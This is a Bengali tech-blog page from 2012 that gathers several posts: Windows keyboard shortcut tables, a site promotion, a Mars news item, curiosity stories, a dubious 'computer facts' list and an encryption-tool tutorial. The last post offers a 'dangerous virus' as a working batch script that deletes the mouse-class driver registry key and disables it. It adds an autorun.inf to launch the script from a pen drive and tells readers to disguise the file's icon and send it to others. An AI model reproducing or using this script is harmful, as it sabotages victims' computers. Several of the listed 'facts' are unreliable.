রবিবার, ৩০ সেপ্টেম্বর, ২০১২

জেনে নিন কিভাবে সর্টকাট কী’র কোড বাহির করবেন

Press To
CTRL+C Copy.
CTRL+X Cut.
CTRL+V Paste.
CTRL+Z Undo.
DELETE Delete.
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin.
CTRL while dragging an item Copy selected item.
CTRL+SHIFT while dragging an item Create shortcut to selected item.
F2 Rename selected item.
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word.
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word.
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph.
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph.
CTRL+SHIFT with any of the arrow keys Highlight a block of text.
SHIFT with any of the arrow keys Select more than one item in a window or on the desktop, or select text within a document.
CTRL+A Select all.
F3 Search for a file or folder.
ALT+ENTER View properties for the selected item.
ALT+F4 Close the active item, or quit the active program.
ALT+Enter Displays the properties of the selected object.
ALT+SPACEBAR Opens the shortcut menu for the active window.
CTRL+F4 Close the active document in programs that allow you to have multiple documents open simultaneously.
ALT+TAB Switch between open items.
ALT+ESC Cycle through items in the order they were opened.
F6 Cycle through screen elements in a window or on the desktop.
F4 Display the Address bar list in My Computer or Windows Explorer.
SHIFT+F10 Display the shortcut menu for the selected item.
ALT+SPACEBAR Display the System menu for the active window.
CTRL+ESC Display the Start menu.
ALT+Underlined letter in a menu name Display the corresponding menu.
Underlined letter in a command name on an open menu Carry out the corresponding command.
F10 Activate the menu bar in the active program.
RIGHT ARROW Open the next menu to the right, or open a submenu.
LEFT ARROW Open the next menu to the left, or close a submenu.
F5 Refresh the active window.
BACKSPACE View the folder one level up in My Computer or Windows Explorer.
ESC Cancel the current task.
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Dialog box keyboard shortcuts
Press To
CTRL+TAB Move forward through tabs.
CTRL+SHIFT+TAB Move backward through tabs.
TAB Move forward through options.
SHIFT+TAB Move backward through options.
ALT+Underlined letter Carry out the corresponding command or select the corresponding option.
ENTER Carry out the command for the active option or button.
SPACEBAR Select or clear the check box if the active option is a check box.
Arrow keys Select a button if the active option is a group of option buttons.
F1 Display Help.
F4 Display the items in the active list.
BACKSPACE Open a folder one level up if a folder is selected in the Save As or Open dialog box.

Natural keyboard shortcuts
You can use the following keyboard shortcuts with a Microsoft Natural Keyboard or any other compatible keyboard that includes the Windows logo key (Start key) and the Application key (Start key).
Press To
Start key Display or hide the Start menu.
+BREAK Display the System Properties dialog box.
Start key +D Show the desktop.
Start key +M Minimize all windows.
Start key +Shift+M Restores minimized windows.
Start key +E Open My Computer.
Start key +F Search for a file or folder.
CTRL+ +F Search for computers.
Start key +F1 Display Windows Help.
Start key + L Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain.
Start key +R Open the Run dialog box.
Start key Display the shortcut menu for the selected item.
Start key +U Open Utility Manager.

Accessibility keyboard shortcuts
Press To
Right SHIFT for eight seconds Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK Switch MouseKeys on and off.
SHIFT five times Switch StickyKeys on and off.
NUM LOCK for five seconds Switch ToggleKeys on and off.
Start key +U Open Utility Manager.

Windows Explorer keyboard shortcuts
Press To
END Display the bottom of the active window.
HOME Display the top of the active window.
NUM LOCK+ASTERISK on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN on numeric keypad (-) Collapse the selected folder.
LEFT ARROW Collapse current selection if it’s expanded, or select parent folder.
RIGHT ARROW Display current selection if it’s collapsed, or select first subfolder.

গুগল (google) এর বিকল্প প্রায় সকল সার্চ ইঞ্জিন সাইট গুলোর তালিকা

ইন্টারনেটে বিনোদনের নতুন জানালা।

ক্যাসপার উইন্ডো কি ?
Image+1 ইন্টারনেটে বিনোদনের নতুন জানালা।
প্রযুক্তির সন্ধানে বাংলার প্রযুক্তি সন্ধানী জনতার চোখে আশার আলো  হয়ে এলো বিনোদন বিষয়ক সাইট ক্যাসপার উইন্ডো। এখানে প্রযুক্তি বিষয়ক বিভিন্ন পোস্ট ছাড়াও থাকছে অনলাইনে  টিভি দেখার সুবিধা এ ছাড়া ও শোনা যাবে অনলাইনে গান , দেখতে পারবেন অনলাইনে মুভি ,অনলাইনে খেলতে পারবেন মজার সম গেম ,জানাতে পারবেন দেশ বিদেশের সর্বশেষ খবর গুলো। 
 
কি জন্য ক্যাসপার উইন্ডো ?
বাংলাদেশ উন্নয়নশীল বিশ্বের মধ্যে সল্প প্রযুক্তি নির্ভর একটি দেশ । প্রযুক্তিগত উন্নয়নের স্বপ্ন নিয়ে এগুচ্ছে  ধীরে ধীরে । কিন্তু আমরা সবাই জানি যে এদেশে প্রযুক্তি খাতে দক্ষ লোকের সংখ্যা খুবই কম । যার ফলে প্রযুক্তি খাতে আশানুরূপ ফলাফল আসছে না । অপরদিকে বর্তমান বিশ্বের সাথে তাল মিলাতে গিয়ে পরনির্ভর হয়ে বসে আছি ।  এতে সম্ভাবনাময় যুবশক্তি যেমন বেকার হচ্ছে , তেমনি প্রযুক্তি ক্ষেত্রে পাইরেসির কালো ছায়া আমাদের ঘিরে আছে । ” দুর্নীতি যেখানে সহজলভ্য , উন্নতি সেখানে অবরুদ্ধ ” – কথাটি এক্ষেত্রেও সত্য । তাই প্রযুক্তি ক্ষেত্রে সবার ক্ষুদ্র ক্ষুদ্র প্রয়াসকে সম্মিলিত করার লক্ষ্য নিয়ে এলো ক্যাসপার উইন্ডো ।এছাড়াও ইন্টারনেট সব ধরনের বিনোদন শুধু মাত্র একটি ওয়েবসাইট এ একত্রিত করা আমাদের মুল লক্ষ্য। 
কি থাকবে এতে ?
প্রযুক্তির দ্বার কে সবার সামনে মুক্ত করার প্রয়াস গুলো থাকবে এখানে । আমাদের  জানা ছোট্ট ছোট্ট বিষয় গুলোকে সবার সামনে তুলে ধরাই হবে আমাদের কাজ । এখানে সবজান্তা কেউ নেই । তাই এখানে ছোট-বড় ,  অ-আ,ক -খ  থেকে সুরু করে জ্ঞানীগুণী সবাই অগ্রগণ্য ।লেখা ও শেখার দ্বার সবার জন্য খোলা । সবার লক্ষ্য হবে একটাই – ” প্রযুক্তির পথকে সবার জন্য সহজ ভাবে মুক্ত করা ” । মুক্তপ্রযুক্তির দিকে লক্ষ্য রেখে সবার ও সময়ের চাহিদাকে প্রাধান্য দিয়ে রাখা হয়েছে বিভিন্ন ক্যাটাগরি -
Image+2 ইন্টারনেটে বিনোদনের নতুন জানালা।
  • অনলাইনে টিভি দেখার সুবিধা।
  • অনলাইনে এইসডি মুভি দেখার সুবিধা।
  • অনলাইনে বাংলা,হিন্দি ও ইংলিশ গান শোনার সুবিধা।
  • কম্পিউটার- কম্পিউটারের জানা অজানা বিভিন্ন বিষয় নিয়ে পোস্ট
  • অনলাইনে বাংলা ছোট গল্প, ভৌতিক গল্প, ভালবাসার গল্প ও কবিতা।  
  • অনলাইনে মজার সব গেম খেলার সুযোগ ।
  • ভুত এফএম অনলাইনে শোনার সুবিধা। 
  • এইসডি ভিডিও গান ডাউনলোড করার সুবিধা ।
  • ইন্টারনেট- ইন্টারনেট এর সঠিক ও উপযুক্ত ব্যবহার নিয়ে লেখালেখি।
  • নানা অজানা মজাদার খবর।
  • সাধারন জ্ঞান বিষয়ক প্রতিবেদন ।
  • টিউটোরিয়াল- প্রযুক্তি বিষয়ক বিভিন্ন টিউটোরিয়াল
  • জনপ্রিয় সব গানের লিরিক্স।
  • ওয়েব-ডিজাইন- ওয়েব ডিজাইন ও ডেভেলপমেন্ট এর জগতে হাতছানি
  • ওয়ার্ডপ্রেস- ব্লগিং এর জগতে ঢুকুন
  • জুমলা- জনপ্রিয় সিএমস এর প্রশিক্ষন
  • টেক-টিপস- প্রযুক্তি বিষয়ক সকল টিপস ও ট্রিকস
  • টেক-রিভিউ- প্রযুক্তি ও প্রযুক্তি পণ্যের রিভিউ
  • টেক-হেল্প- প্রযুক্তি সমস্যা নিয়ে কথন
  • নতুন-প্রযুক্তি- নিত্য নতুন প্রযুক্তির সমাহার
  • প্রোগ্রামিং- প্রোগ্রামিং ল্যাঙ্গুয়েজ ও এলগরিদম
  • বলিউড, হলিউড, টলিউড অভিনেত্রিদের এক্সক্লুসিভ ছবি।
  • মুক্ত-সফট- ফ্রী ও ওপেন সোর্স সফটওয়্যার এর ঘর
  • হার্ডওয়্যার- হার্ডওয়্যার পরিচিতি, সমস্যা ও সমাধান
  • মোবাইল- মুঠোফোন নিয়ে টুকিটাকি
  • খবর- প্রযুক্তির বিভিন্ন খবরাখবর
  • অন্যান্য- প্রযুক্তি বিষয়ক অন্যান্য কথা
বিশেষ ফিচার:
প্রত্যেকটি পোস্ট ফেইসবুক,টুইটার এ বন্ধুদের সাথে শেয়ার করার সুযোগ।এছাড়া ও এগুলো সরাসরি পিডিএফ  ফাইলে কনভার্ট করার সুযোগ।

মঙ্গল গ্রহে খরস্রোতা নদীর চিহ্ন!

2012 09 28 19 43 30 5065fde2243dd untitled 12 মঙ্গল গ্রহে খরস্রোতা নদীর চিহ্ন!
মঙ্গলের বুকে লালচে-বাদামি ধুলায় আবৃত শিলাস্তর
মঙ্গল গ্রহের পাহাড়ি এলাকায় পাথরের কোল ঘেঁষে কয়েক হাজার কোটি বছর আগে বয়ে চলত খরস্রোতা নদী। দীর্ঘদিন ধরে সেই স্রোতে পাথর ক্ষয়ে পরিণত হতো নুড়িতে। মার্কিন মহাকাশ গবেষণা সংস্থার (নাসা) মহাকাশযান কিউরিওসিটি মঙ্গলপৃষ্ঠে পানিপ্রবাহের সেই প্রমাণ পেয়েছে। নাসা গত বৃহস্পতিবার এ তথ্য জানিয়েছে। খবর বিবিসি ও এএফপির।
নাসার জেট প্রপালশন ল্যাবরেটরির গবেষকেরা ক্যালিফোর্নিয়ায় এক সংবাদ সম্মেলনে জানান, কিউরিওসিটি মঙ্গলপৃষ্ঠে যেসব পাথরের সন্ধান পেয়েছে, সেগুলোর বয়স কয়েক শ কোটি বছর বলে অনুমান করা যেতে পারে। সম্ভবত সেখানে দীর্ঘদিন আগে নদীপ্রবাহ ছিল এবং সেই স্রোতে নুড়ি জমা হয়েছে। মঙ্গলপৃষ্ঠে নদীপ্রবাহের চিহ্নসংবলিত নুড়ি বিছানো পথের সন্ধান এটাই প্রথম।
কিউরিওসিটির বিজ্ঞানী রেবেকা উইলিয়ামস বলেন, কিউরিওসিটির পাঠানো ছবিতে পাথরগুলোর আকৃতি দেখে বোঝা যায়, এক জায়গা থেকে অন্যত্র স্রোতে ভেসে যেত। এই আকৃতির পাথর সরিয়ে নেওয়া বাতাসের পক্ষে সম্ভব নয়।
নাসার গবেষকেরা জানান, কিউরিওসিটির পাঠানো ছবিতে মঙ্গলপৃষ্ঠে প্রাচীন একাধিক নদীর সংযোগস্থলের অস্তিত্বের ইঙ্গিত রয়েছে। ছবিতে দৃশ্যমান পাথরগুলো ক্ষয়ে যাওয়ার কারণ সম্ভবত খরস্রোতা নদীর প্রবাহ। কিউরিওসিটি মঙ্গলপৃষ্ঠ থেকে ১০-১৫ সেন্টিমিটার পুরু একটি পাথর তুলে পরীক্ষা করেছে। কানাডার উত্তর-পশ্চিমাঞ্চলীয় একটি লেকের নাম অনুসারে গবেষকেরা ওই পাথরটির নাম দিয়েছেন ‘হোটা’। পাথরটির গায়ে লেগে থাকা কাঁকর বিশ্লেষণ করে পানিপ্রবাহের গতি এবং সংশ্লিষ্ট নদীর উৎসবিষয়ক তথ্য অনুসন্ধানের চেষ্টা চালাবেন বিজ্ঞানীরা।
মঙ্গলপৃষ্ঠে পানির প্রবাহ ছিল বলে গবেষকেরা দীর্ঘদিন ধরেই ধারণা করছিলেন। তাঁরা কৃত্রিম উপগ্রহের সাহায্যে তোলা মঙ্গলের ছবি বিশ্লেষণ করে সেখানে পানির অস্তিত্বের ধারণা করতেন। তবে কিউরিওসিটি সেখানে অবতরণের পর প্রাচীন নুড়ি ও বালু দিয়ে গঠিত পাথরের ছবি তুলে পৃথিবীতে পাঠাতে শুরু করে।
কিউরিওসিটি গত ৬ আগস্ট অবতরণ করে ‘লাল গ্রহের’ পৃষ্ঠে। গবেষকদের ধারণা, সেখানকার পাথর বিশ্লেষণ করে পানির অস্তিত্বের ব্যাপারে আরও গুরুত্বপূর্ণ তথ্য পাওয়া যাবে। মঙ্গল গ্রহে মানুষের বসবাসের সম্ভাব্যতা এবং অতীতে কখনো প্রাণের অস্তিত্ব ছিল কি না, দুই বছরব্যাপী অভিযানে তা যাচাই করে দেখবে কিউরিওসিটি।

১৫ এমবি ইন্টারনেট ১৫ দিনের জন্য একদম মাংনা … GP

  • আপনার মোবাইলের মেসেজ অপশন এ যান ।
  • Write Message এ ক্লিক করুন ।
  • এবার লিখুন Igenp7
  • এখন 9999 নাম্বারে সেন্ড করুন ।

আপনার কাজ শেষ । এখন পর পর ২ টা SMS আসবে । এবং আপনি Succesful ।

যদি না আসে তবে দেখুন আপনার আগে কোন Package অ্যাক্টিভ করা আছে কিনা । যদি অ্যাক্টিভ করা থাকে তাহলে বদ্ধ করে নিতে হবে এজন্য stop লিখে 5000 নাম্বারে এসএমএস করুন । তারপর চেষ্টা করুন ।

বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি…

রিক্সা চালিয়ে চীন থেকে লন্ডন:

old বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি...বেইজিং আর লন্ডনের সেতুবন্ধ হয়ে উঠতে চীনের চেন গুয়ানমিং(৫৭ বছর বয়সী) নামক এক কৃষক দুই বছর আগে লন্ডনের উদ্দেশ্যে যাত্রা শুরু করেন রিকশা নিয়ে। ৬০ হাজার  কিলোমিটার পথ পাড়ি দিয়ে ১৬টি দেশ ঘুরে লন্ডন অলিম্পিকের উদ্বোধনের আগে লন্ডন পৌছেন তিনি । এই যাত্রায় তাকে বন্যা, প্রচন্ড গরম, শুকনো আবহাওয়া সবই সইতে হয়েছ। দীর্ঘ এই ভ্রমণের প্রমাণ হিসেবে তার পাসপোর্টে আছে ভিন্ন ভিন্ন দেশের ভিসা। এই পরিশ্রম এবং অলিম্পিকের প্রতি এই ভালবাসায় মুগ্ধ হয়ে লন্ডনবাসী চেনকে আগ্রহভরে বরণ করে নেয়। চেনও মুগ্ধ হয়েছেন লন্ডনবাসীর আতিথেয়তায়। সংগ্রহ: কারেন্ট ওয়ার্ল্ড সেপ্টেম্বর ২০১২

 পুনরুত্থান!

রহস্যময় এ পৃথিবীতে কত বিচিত্র ঘটনাই না ঘটে। সম্প্রতি এমনই এক বিস্ময়কর ঘটনা ঘটেছে মিশরে। মারা যাওয়ার পরই আকস্মিকভাবে বেচেঁ উঠেছেন হামিদ হাফেজ আল নূরী হেটা নামের এক ব্যাক্তি সিম্মান প্রদেশের লুক্সোর এলাকার বাসিন্দা হাফেজের হৃদযন্ত্রের ক্রিয়া হঠাৎ বন্ধ হয়ে যায়। পরীক্ষা-নিরীক্ষার পর স্থানীয় প্রবীণ বয়োজ্যেষ্ঠেরা তাকে মৃত ঘোষণা করেন। এমনকি ইসলামী বিধান অনুযায়ী মৃতদেহের দাফন-জানাজা প্রক্রিয়াও সম্পন্ন হয়। হাফেজকে সমাহিত করার সব প্রক্রিয়া যখন শেষ ঠিক সেই সময় মৃতদেহের মুখমন্ডলের সজীবতা দেখে সন্দেহের বশে স্থানীয় এক চিকিৎসক এগিয়ে গিয়ে হাফেজের নাকে হাত দেন। পরে হাফেজের বুকে পাম্প করলে সে কথা বলতে শুরু করে। সংগ্রহ: কারেন্ট নিউজ জুন ২০১২

 বিস্ময়কর বালক!

১০ বছর মাত্র বয়স! নাম তার মানপীত। বাড়ি ভারতের পাঞ্জাব শহরের অমৃতসর শহরে। তার কপালের উপর নারিকেল রেখে বেসবল ব্যাট দিয়ে আঘাত করলে নারিকেল ভেঙ্গে যায়। মার্শাল আর্ট প্রশিক্ষণের নিজের ভিন্নধর্মী ক্ষমতা প্রকাশের ইচ্ছা থেকে এমন ঝুকিঁপূর্ণ কাজটি সে বেছে নেয়। এছাড়াও সে আরও কিছু ভয়ানক কাজে পারদর্শিতা অর্জন করেছে। চলন্ত গাড়ির উপর দিয়ে লাফিয়ে পার হওয়া, তরবারি চালনাসহ আরো অদ্ভুত অদ্ভুত বিষয়ে তার রয়েছে বিশেষ ক্ষমতা। সংগ্রহ: কারেন্ট নিউজ জুন ২০১২

 সাবানখেকো:

images24 বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি...প্রতিদিন সাবান খান যুক্তরাস্ট্রের টেম্পোষ্ট হেন্ডারসন। অন্তত দৈনিক পাচঁটি সাবান খাওয়ার প্রয়োজন হয় তার । সাবান খেলে প্রাণ যেতে পারে এই কথা জানার পরও হেন্ডারসন সাবান খাওয়া অব্যাহত রয়েছে। চিকিৎসকদের মতে হেন্ডারসন পাইকা নামক একধরনের রোগে আক্রান্ত। এই রোগে আক্রান্ত ব্যক্তিরা অস্বাভাবিক খাবারে অভ্যস্ত হয়ে পড়ে । সাবান ছাড়াও তারা ধাতব মুদ্রা, চক, ব্যাটারি ও টুথব্রাশের মতো খাদ্য ভক্ষণ করতে পারে পাইকা আক্রান্ত রোগীরা । সংগ্রহ: কারেন্ট ওয়ার্ড সালতামামি ২০১১

উড়ন্ত ঘর:

large বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি... অবিশ্বাস্য হলেও সত্য যে ব্রিটেনের ন্যাশনাল জিওগ্রাফিক টিম উড়ন্ত বাড়ি নির্মাণ করেছে । হিলিয়াম গ্রাসভর্তি ৩০০ বেলুন হালকা হার্ডবোর্ড দিয়ে বানানো ঘরটি ভূমি হতে ১০ হাজার ফুট উপরের আকাশে ১৪ জন মানুষ  নিয়ে উড়েছে। ইট, বালি, সিমেন্টের মত ভারী উপাদান নয়, হালকা হার্ডবোর্ড দিয়ে তৈরী বাড়িটিকে নিয়ে ৩০০ বেলুন আকাশে উড়েছিল এই ৩০০ বেলুনের প্রতিটির দৈর্ঘ্য ছিল ৮ ফুট ।সংগ্রহ: কারেন্ট ওয়ার্ড সালতামামি ২০১১

চুম্বক মানব:

Screen shot বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি...চুম্বকের ধর্ম হচ্ছে কেবল ধাতব বস্তুকে আকর্ষণ করা কিন্তু চুম্বক মানব শরীরে আকর্ষন করছে! এমন অদ্ভুত ঘটনা ঘটেছে সার্বিয়াতে। দেশটির সাত বছরের শিশু ‘বোগদান’ এর সংস্পর্শে কোন ধাতব বস্তু এলেই আটকে যায়। চিনামাটির থালা, বাটি, টিভির রিমোট কন্ট্রোল, ইলেক্ট্রনিক যন্ত্র, ধাতব চামচ, ধাতব ছুরি ইত্যাদি ‘বোগদানের’ গায়ে রাখলে তা আঠার মত আটকে থাকে। বোগদানের  পরিবারের সদস্যদের ভাষ্য জন্ম থেকেই বিভিন্ন বস্তুকে আকর্ষণ করার এই ব্যতিক্রমী ক্ষমতা রয়েছে ‘বোগদানের’ শরীরে ।সংগ্রহ: কারেন্ট ওয়ার্ড সালতামামি ২০১১  এইছাড়া একটি লিংক সেয়ার করছি যেখানে একসাথে অনেক চুম্বক মানবকে দেখতে পাবেন

 

ফোমখাদক:

sofaeater 300x182 বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি... ভিন্ন এক খাবারে আসক্ত যুক্তরাস্ট্রের অ্যাডেল এডওয়ার্ডস। ফ্লোরিডা অঙ্গরাজ্যের ৩০ বছর সয়ী এই নারী ২০ বছর ধরে ফোম খাচ্ছেন। ১০ বছর বয়সে শুরু, এখন তিনি পাঁচ সন্তানের জননী কিন্তু ফোম খাওয়া এখনি ছাড়তে পারেন নি। শুধু ফোম নয় তুলা, ইলাস্টিক, রাবার, ব্যান্ড সবই খাচ্ছেন তিনি। চিকিৎসকরা এই রোগের নাম দিয়েছেন “পাইকা” এই রোগে আক্রান্ত রোগীরা বিভিন্ন ধরনের অখাদ্য কুখাদ্য গ্রহন করে থাকে ।সংগ্রহ: কারেন্ট ওয়ার্ড সালতামামি ২০১১

আকাশ বন:

stefano boeri bosco verticale sky forest 825 300x178 বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি... ইতালিতে নির্মাণ করা হচ্ছে বিশ্বের প্রথম ‘আকাশ বন’। স্টেফানো বোইরির ডিজাইনে মিলানে ২৭ তলায় ঐ ফ্ল্যাট ব্লক দুটি হবে গাছবাড়ি। ৭৩০টি বৃক্ষ লাগানো হবে পাশাপাশি দুটি ব্লকের এই ভবনটিতে। এছাড়া ৫ হাজার গুল্মও ১১ হাজার  ভুমিজ উদ্ভিদও থাকবে। এখানকার সবচেয়ে বড় গাছটি  হবে ৩০ ফুট উচুঁ। ভবনটির দুটি ব্লকের একটি হবে ৩৬৫ ফুটও অপরটি হবে ২৬০ ফুট।সংগ্রহ: কারেন্ট ওয়ার্ড সালতামামি ২০১১


অদ্ভুতুড়ে গিটার:

sfsf বিস্ময়কর কিছু ঘটনা ভাল লাগবে আশা করছি...দেখামাত্র অবাক হবেন যে কেউ, যে এ আবার কেমন গিটার । কিন্তু সত্য হলো এই গিটারটির রয়েছে বারোটি গলা। ৬ মাসের অক্লান্ত পরিশ্রম শেষে তৈরী করা হয়েছে এই গিটারটি। সুর তুলতে ঝামেলা এড়াতে গিটারটি তৈরী করা হয়েছে অর্ধবৃত্তাকার আদলে। বিরল এই গিটারটি তৈরী করেছেন শিল্পী ‘ইয়োশিহিকে স্যাটো’।সংগ্রহ: কারেন্ট ওয়ার্ড সালতামামি ২০১১

কম্পিউটারের সবচেয়ে Interesting 25টি Facts

1. ইন্টারনেটের মোট 80% picture ই নগ্ন মহিলার।
2. Microsoft Windows tutorial এর অন্য নাম হলো ‘Crash Course’!
3. Bill Gates এর বাড়ির ডিজাইনটি করা হয়েছিল একটি MAC কম্পিউটার দিয়ে।
4. 2012 সালের মধ্যে পৃথিবীতে মোট ইন্টারনেটে কানেক্টটেড ডিভাইসের সংখ্যা হবে প্রায় 1,700 কোটি।
5. প্রতি মাসে প্রায় 10 লাখ নতুন Domain name registered হয়।
6. E-mail এর বিস্তৃতি/ ব্যবহার Web এর তুলনায় অনেক বেশী।
7. পৃথিবীতে 1টি সাধারণ ওয়েব পেইজের বিপরীতে রয়েছে 5টি porn পেইজ।
8. 80 দশকে একটি IBM computer কে সম্পূর্ন কম্পিউটার হিসেবে গন্য করা হতো না যদি না এটি Microsoft Flight Simulator কে চালাতে সক্ষম হতো ।
9. MySpace রয়েছে 110 million registered users. যদি MySpace একটি দেশ হতো তাহলে এটি Mexico-র চেয়ে দশগুন বড় হতো ।
10. গত দশ বছরে আমেরিকাতে প্রতি 8টি married couples এর মধ্যে 1টি পরিচয় হয়েছে online এ।
11. 21 বছরের একজন মানুষ গড়ে 5,000 ঘন্টা ভিডিও গেম খেলেন,  250,000 ইমেইল/instant/text messages আদান প্রদান করেন এবং 10,000 ঘন্টা ব্যায় করেন মোবাইল ফোনে ।
12. একজন কম্পিউটার ব্যবহারকারী প্রতি মিনিটে গড়ে 7 বার চোখের পলক ফেলেন । যা সাধারণ সময়ের চেয়ে অর্ধেকেরও কম ।
13. প্রথম banner advertising ব্যবহৃত হয় 1994 সালে ।
14. বিশ্বের প্রথম কম্পিউটার মাউস আবিস্কার করেন Doug Engelbart 1964 সালে যা ছিল কাঠের তৈরি।
15. বিশ্বের প্রথম রেজিস্ট্রিকৃত domain এর নাম হলো  symbolics.com.
16. বিশ্বের প্রথম কম্পিউটারের নাম ছিল Z1, যা 1936 সালে আবিস্কার করেছিলেন Zuse. তাঁর দ্বিতীয় আবিস্কার ছিল Z2 যার নির্মান কাজ শেষ হয়েছিল 1939 সালে এবং এটি ছিল প্রথম fully functioning electro-mechanical computer.
17. পৃথিবীতে প্রায় 1,319,872,109 জন মানুষ ইন্টারনেটের সাথে কানেক্টটেড ।
18. বিশ্বজুড়ে প্রায় 106 কোটি instant messaging accounts রয়েছে।
19. 5 কোটি ব্যবহারকারী হতে যেখানে রেডিওর সময় লেগেছিল 38 বছর, টেলিভিশনের 13 বছর সেখানে ওয়েব এর লেগেছে মাত্র 4 বছর ।
20. 70% ভাইরাস নির্মাতা কাজ করে কোন না কোন crime syndicate প্রতিষ্ঠানে।
21. “Rother J” নামক একটি প্রোগ্রামের মাধ্যমেই প্রথম কম্পিউটার ভাইরাসের আবির্ভাব ঘটে। যে কম্পিউটারের সাহায্যে এটি তৈরি করা হয়েছিল সেই কম্পিউটারেই সেটি দ্বারা আক্রান্ত হয়েছিল ।
22. সবচেয়ে ভয়ঙ্কর MS-DOS virus হলো Michelangelo (1991), যা boot sector, hard drive ও floppy drive কে আক্রান্ত করতো । অত্যান্ত দ্রুত পৃথিবীতে এর বিস্তার ঘটেছিল ।
23. একটি  virus কখনোই নিজ থেকে আপনার কম্পিউটারকে আক্রান্ত করতে পারে না যদি না আপনি এগুলোকে কোন infected files বা diskettes এর মাধ্যমে আপনার কম্পিউটারে নিয়ে আসেন বা ইন্টারনেট থেকে ডাউনলোড করেন।
24. মোট জনসংখ্যার মধ্যে সর্বোচ্চ ইন্টারনেট ব্যবহারকারীর দেশ হচ্ছে Sweden  (75%)
25. পৃথিবীর প্রথম জনপ্রিয় ওয়েব ব্রাউজারের নাম Mosaic যা 1993 সালে রিলিজ হয়।

গোপন কথা লিখে দিন সবার সামনে – কেউ কিছুই বুঝবে না

সফটওয়ার টির নাম Ciphertext.
আসলে Ciphertext একটি প্রক্রিয়া যার মাদ্ধমে কোন লেখা কে encrypt করা হয়।
Wikipedia অনুসারে, Ciphertext is the result of encryption performed on plaintext using an algorithm.
আসুন সফটওয়ার টির বেবহার দেখে নেই।
প্রথমে এটি ডাউনলোড করে নিন।
Capture12 ☻☻ গোপন কথা লিখে দিন সবার সামনে   কেউ কিছুই বুঝবে না ☻☻
পাসওয়ার্ড: “password”
তারপর zip ফাইল টি extract করুন।
তাহলে সফটওয়ার টি পাবেন। সেটা ওপেন করুন। এরকম দেখতে পাবেনঃ
Capture15 ☻☻ গোপন কথা লিখে দিন সবার সামনে   কেউ কিছুই বুঝবে না ☻☻
এখানে একটি পাসয়ার্ড দিন। ** মনে রাখবেন, আপনি যে পাসয়ার্ড বেবহার করবেন, আপনার মেসেজ প্রাপক এর এক ই পাসয়ার্ড বেবহার করতে হবে **
আমি এখানে পাসয়ার্ড দিয়েছি 1234. আপনারা আপনাদের পছন্দ মত পাসওয়ার্ড দিন।
তারপর OK বাটনে ক্লিক করুন।
এরকম দেখাবেঃ
Capture31 ☻☻ গোপন কথা লিখে দিন সবার সামনে   কেউ কিছুই বুঝবে না ☻☻
আপনি একটি ফাকা বক্স পাবেন। এখানে আপনি যে কথা টি গোপন রাখতে চান সে কথা লিখুন। তারপর Encode বাটন চাপুন।
দেখবেন আপনার লেখা গুলো encrypt হয়ে গিয়েছে। এবং কিছু ক্যারেক্টার দেখতে পাবেন। এই ক্যারেক্টার গুলোর মদ্ধেই আপনার লেখা লুকিয়ে আছে।
এটি দেখতে এরকম দেখাবেঃ
Capture41 ☻☻ গোপন কথা লিখে দিন সবার সামনে   কেউ কিছুই বুঝবে না ☻☻
এখন আপনি খুব সহজে Copy বাটনে ক্লিক করে লেখা গুলো কপি করে facebook, yahoo messenger, gmail, skype সহ অন্য যে কোনো উপায়ে প্রাপক এর কাছে এই লেখা গুলো পেস্ট করে পাঠিয়ে দিন।
প্রাপক যখন আপনাদের নির্ধারিত পাসওয়ার্ড দিয়ে সফটওয়ার টি ওপেন করবে তখন ফাকা বক্স টি দেখতে পাবেন। সেখানে আপনার পাঠানো লেখা গুলো পেস্ট করার পর Decode বাটন প্রেস করলে আপনার গোপন লেখা টি দেখতে পাবেন।
তখন হবে এরকমঃ
Capture32 ☻☻ গোপন কথা লিখে দিন সবার সামনে   কেউ কিছুই বুঝবে না ☻☻
এক্ষেত্রে প্রেরক এবং প্রাপক, দুই জন এর কম্পিউটারেই এই সফটওয়ার টি থাকতে হবে। এবং এক ই পাসওয়ার্ড বেবহার করতে হবে।
শুধুমাত্র তাহলেই লেখা টি সঠিক ভাবে পাওয়া যাবে।

ছোট কিন্তু মারাত্মক বিপদজনক একটি ভাইরাস তৈরি করুন যা দিয়ে যে কোন কম্পিউটার এর মাউস ডিসাবল করা যাবে।

শুরু করলামঃ

১। নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন pp.bat নামে
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
এখন এই ফাইলটির ইমেজ চেঞ্জ করে কাউকে সেন্ড করুন। এটা ক্লিক করলেই মাউস অচল হয়ে যাবে। (আর যদি পেন ড্রাইভ এর মাঝে করতে চান স্টেপ ২ দেখুন তবে এই ফাইল টাও লাগবে)
২। এবার নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন autorun.inf নামে
[autorun]
Open=pp.bat
Action=Mouse Disable
৩। pp.bat নাম না দিয়ে যদি অন্য কিছু দেন তাহলে কিন্তু কাজ করবে না। অন্য নাম দিতে চাইলে ২ নং কোডিং এর ২ নং লাইনের pp.bat নাম বাদ দিয়ে নিজের নাম দিন এবং ১নং কোডিং ও একি নামে সেভ করা থাকতে হবে।

সমাধান দেখুন

